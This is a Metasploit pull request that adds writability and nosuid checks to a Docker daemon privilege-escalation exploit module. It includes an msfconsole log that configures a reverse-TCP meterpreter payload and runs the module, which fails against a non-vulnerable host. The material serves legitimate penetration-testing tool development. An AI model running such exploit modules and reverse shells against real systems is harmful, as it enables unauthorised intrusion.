Add check for writable and nosuid WritableDir

[bcoles]

This PR adds enhances the exploit/linux/local/docker_daemon_privilege_escalation module (added in #7027) to check whether the user-specified WritableDir is writable and mounted without nosuid.

Before these changes:

• If the WritableDir was not writable, the module would (likely) fail horribly
• If the WritableDir was mounted nosuid, the module would fail to privesc - probably return a new low-privileged session or no new session.

While I was at it, a check for CheckCode::Vulnerable within the exploit method, and an associated ForceExploit code pattern, were added.

I haven't tested these changes on a vulnerable system. I have, however, at least verified that the changes appear to not horribly break the module on a non-vulnerable system.

msf5 exploit(multi/handler) > use exploit/linux/local/docker_daemon_privilege_escalation 
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > check

[-] Failed to access Docker daemon.
[*] The target is not exploitable.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > options

Module options (exploit/linux/local/docker_daemon_privilege_escalation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 1
set lhost 127.0.0.1       set lhost 172.16.191.188  set lhost 172.16.191.196  
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[-] Failed to access Docker daemon.
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > 

[wchen-r7]

Release Notes

This improves the check method for the docker_daemon_privilege_escalation exploit module to check whether the user-specified WritableDir is writable and mounted without nosuid.